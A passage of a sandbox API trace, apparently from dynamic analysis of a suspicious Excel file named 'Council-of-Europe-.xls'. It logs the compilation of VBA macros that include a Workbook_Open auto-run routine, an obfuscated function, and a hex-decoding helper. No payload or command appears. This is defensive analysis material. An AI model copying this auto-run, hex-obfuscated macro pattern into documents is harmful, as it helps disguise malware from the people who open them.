cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ö", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="×", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ø", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ù", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ú", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Û", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ü", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Ý", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="Þ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ß", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="à", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="á", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="â", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ã", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ä", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="å", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="æ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ç", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.452] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="è", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="é", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ê", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ë", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ì", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="í", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="î", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ï", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ð", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ñ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ò", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ó", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ô", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="õ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ö", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="÷", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ø", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ù", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ú", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="û", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ü", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ý", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="þ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="ÿ", cchSrc=1, lpCharType=0x1cf870 | out: lpCharType=0x1cf870) returned 1 [0155.453] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0155.454] IMalloc:Alloc (This=0x7fefecb5380, cb=0x8) returned 0xa066eb0 [0155.454] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7f0a2e0 [0155.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa066eb0, cbMultiByte=8, lpWideCharStr=0x7f0a2e0, cchWideChar=8 | out: lpWideCharStr="Module1") returned 8 [0155.454] IMalloc:Free (This=0x7fefecb5380, pv=0xa066eb0) [0155.454] IMalloc:Free (This=0x7fefecb5380, pv=0x7f0a2e0) [0155.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0155.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sa") returned 0x105f15 [0155.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732b0e, cbMultiByte=2, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0155.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732b0e, cbMultiByte=2, lpWideCharStr=0x9c33418, cchWideChar=2 | out: lpWideCharStr="sa") returned 2 [0155.454] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x30) returned 0x7c56050 [0155.454] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6240000 [0155.456] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.456] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0155.456] CExposedStream::Read () returned 0x0 [0155.456] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa1db7c0, cb=0x27c) returned 0xa1db7c0 [0155.456] CExposedStream::Release () returned 0x1 [0155.456] CExposedStream::Release () returned 0x0 [0155.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1cf9d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0155.457] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1cfb10, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0155.458] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.458] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066e90, cb=0x10) returned 0x7f0a2e0 [0155.458] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93a50 [0155.458] IMalloc:GetSize (This=0x7fefecb5380, pv=0x9c93a50) returned 0x80 [0155.458] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac15d0 [0155.458] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb8) returned 0x9ac1690 [0155.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1cf9d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0155.458] CoCreateGuid (in: pguid=0x1cf700 | out: pguid=0x1cf700*(Data1=0x51deadc5, Data2=0x60c9, Data3=0x4563, Data4=([0]=0xa4, [1]=0xf1, [2]=0xc, [3]=0xe9, [4]=0xe4, [5]=0x4a, [6]=0xb6, [7]=0x26))) returned 0x0 [0155.458] CoCreateGuid (in: pguid=0x1cf710 | out: pguid=0x1cf710*(Data1=0xa8377dd2, Data2=0x36ea, Data3=0x457f, Data4=([0]=0x97, [1]=0xa3, [2]=0xd2, [3]=0x8, [4]=0xcd, [5]=0x78, [6]=0x60, [7]=0x5c))) returned 0x0 [0155.458] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisWorkbook", cchWideChar=13, lpMultiByteStr=0x1cf720, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisWorkbook", lpUsedDefaultChar=0x0) returned 13 [0155.458] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.458] GetLocalTime (in: lpSystemTime=0x1cf5f8 | out: lpSystemTime=0x1cf5f8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x3, wDay=0x8, wHour=0x14, wMinute=0x2e, wSecond=0x2d, wMilliseconds=0x364)) [0155.458] _ultow_s (in: _Value=0x6078a635, _Buffer=0xa14b9b4, _BufferCount=0x9, _Radix=16 | out: _Buffer="6078a635") returned 0x0 [0155.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="026078a635", cchWideChar=11, lpMultiByteStr=0x1cf590, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="026078a635", lpUsedDefaultChar=0x0) returned 11 [0155.458] strcpy_s (in: _Dst=0x9808ac0, _DstSize=0xd, _Src="ThisWorkbook" | out: _Dst="ThisWorkbook") returned 0x0 [0155.458] IMalloc:Realloc (This=0x7fefecb5380, pv=0x969f0e0, cb=0xd0) returned 0x9a72e90 [0155.458] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.458] wcscpy_s (in: _Destination=0xa14b9c8, _SizeInWords=0xd, _Source="ThisWorkbook" | out: _Destination="ThisWorkbook") returned 0x0 [0155.458] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.458] wcscpy_s (in: _Destination=0xa14b9e8, _SizeInWords=0xd, _Source="ThisWorkbook" | out: _Destination="ThisWorkbook") returned 0x0 [0155.458] IMalloc:Realloc (This=0x7fefecb5380, pv=0x78de6f0, cb=0x24) returned 0x9922b70 [0155.459] IMalloc:Realloc (This=0x7fefecb5380, pv=0x248f920, cb=0xc) returned 0x78de6f0 [0155.459] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x48) returned 0x5136cf0 [0155.459] IMalloc:Free (This=0x7fefecb5380, pv=0x96a18b0) [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923ce0 [0155.459] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9923ce0, cb=0x74) returned 0x7eb47b0 [0155.459] IMalloc:Free (This=0x7fefecb5380, pv=0x5136cf0) [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x3d0) returned 0xa199940 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923ce0 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x10) returned 0x7efe6c0 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93ae0 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0x248f920 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066e90 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x688) returned 0x985c480 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93b70 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x640) returned 0xa1664a0 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x9923c80 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066eb0 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x0) returned 0xa066ec0 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x20) returned 0x991f510 [0155.459] IMalloc:Alloc (This=0x7fefecb5380, cb=0x80) returned 0x9c93c00 [0155.459] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0155.459] wcsncpy_s (in: _Destination=0x1cf770, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0x0 [0155.459] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", cchLength=0x33 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls") returned 0x33 [0155.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", cchWideChar=52, lpMultiByteStr=0x1cf6a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\council-of-europe-.xls", lpUsedDefaultChar=0x0) returned 52 [0155.460] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Council-of-Europe-.xls") returned 0 [0155.460] CExposedStream::Seek () returned 0x0 [0155.460] CExposedStream::AddRef () returned 0x2 [0155.460] CExposedStream::Read () returned 0x0 [0155.460] CExposedStream::AddRef () returned 0x3 [0155.460] CExposedStream::Release () returned 0x2 [0155.460] IMalloc:Alloc (This=0x7fefecb5380, cb=0x2ee0) returned 0xa1dba50 [0155.460] CExposedStream::Read () returned 0x0 [0155.460] CExposedStream::Read () returned 0x0 [0155.460] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.460] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0155.460] IMalloc:Alloc (This=0x7fefecb5380, cb=0xd) returned 0x7f05340 [0155.460] IMalloc:Alloc (This=0x7fefecb5380, cb=0x1a) returned 0x991f4b0 [0155.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f05340, cbMultiByte=13, lpWideCharStr=0x991f4b0, cchWideChar=13 | out: lpWideCharStr="ThisWorkbook") returned 13 [0155.460] IMalloc:Free (This=0x7fefecb5380, pv=0x7f05340) [0155.460] IMalloc:Free (This=0x7fefecb5380, pv=0x991f4b0) [0155.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0155.461] IMalloc:Alloc (This=0x7fefecb5380, cb=0x28) returned 0x991f4b0 [0155.461] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bc3230 [0155.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x991f4b0, cbMultiByte=40, lpWideCharStr=0x9bc3230, cchWideChar=40 | out: lpWideCharStr="0{00020819-0000-0000-C000-000000000046}") returned 40 [0155.461] IMalloc:Alloc (This=0x7fefecb5380, cb=0x50) returned 0x9bc31d0 [0155.461] IMalloc:Realloc (This=0x7fefecb5380, pv=0x248f920, cb=0x20) returned 0x991f240 [0155.461] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa066eb0, cb=0x28) returned 0x991f1e0 [0155.461] IMalloc:Free (This=0x7fefecb5380, pv=0x991f4b0) [0155.461] IMalloc:Free (This=0x7fefecb5380, pv=0x9bc3230) [0155.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0155.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.461] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0155.462] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0155.463] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732b62, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0155.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732b62, cbMultiByte=9, lpWideCharStr=0x9c33418, cchWideChar=9 | out: lpWideCharStr="SZpmrPBsT") returned 9 [0155.464] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="h") returned 0x10105f [0155.466] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c93c00, cb=0x100) returned 0x9952780 [0155.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.467] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="a" | out: _Dst="a") returned 0x0 [0155.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Split") returned 0x10298d [0155.467] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="h") returned 0x10105f [0155.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0155.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0155.468] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0155.469] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0155.469] atoi (_Str="0") returned 0 [0155.469] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0155.469] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0155.470] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.471] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.471] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="a" | out: _Dst="a") returned 0x0 [0155.471] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0155.471] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0155.471] IMalloc:Realloc (This=0x7fefecb5380, pv=0x0, cb=0x30) returned 0x7c56010 [0155.471] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6250000 [0155.473] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.473] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0155.473] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="h2s") returned 0x1095db [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Join") returned 0x10264d [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="a") returned 0x101058 [0155.474] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9c93b70, cb=0x100) returned 0x9952890 [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SZpmrPBsT") returned 0x109352 [0155.474] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="SZpmrPBsT" | out: _Dst="SZpmrPBsT") returned 0x0 [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="h2s") returned 0x1095db [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0155.474] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Workbook_Open") returned 0x10e19b [0155.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c92, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0155.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c92, cbMultiByte=13, lpWideCharStr=0x7ddd708, cchWideChar=13 | out: lpWideCharStr="Workbook_Open") returned 13 [0155.474] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9952780, cb=0x200) returned 0x7ae6330 [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mykk") returned 0x1097c3 [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="g") returned 0x10105e [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d") returned 0x10105b [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AC") returned 0x105c7d [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0155.475] strcpy_s (in: _Dst=0x7fee51fea60, _DstSize=0x100, _Src="i" | out: _Dst="i") returned 0x0 [0155.475] atoi (_Str="1") returned 1 [0155.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0155.475] atoi (_Str="70") returned 70 [0155.476] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9952890, cb=0x200) returned 0xa19dd20 [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Celles") returned 0x108554 [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="i") returned 0x101060 [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="A1") returned 0x105c6b [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisWorkbook") returned 0x10e37c [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sheets") returned 0x101b0a [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Celles") returned 0x108554 [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Value") returned 0x104be4 [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="A1") returned 0x105c6b [0155.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0155.477] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0155.477] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AC") returned 0x105c7d [0155.478] strcpy_s (in: _Dst=0x7fee51fefc0, _DstSize=0x100, _Src="AC" | out: _Dst="AC") returned 0x0 [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AC") returned 0x105c7d [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="A1") returned 0x105c6b [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0155.478] LHashValOfNameSysA (syskind=0x3, lcid=0x409, 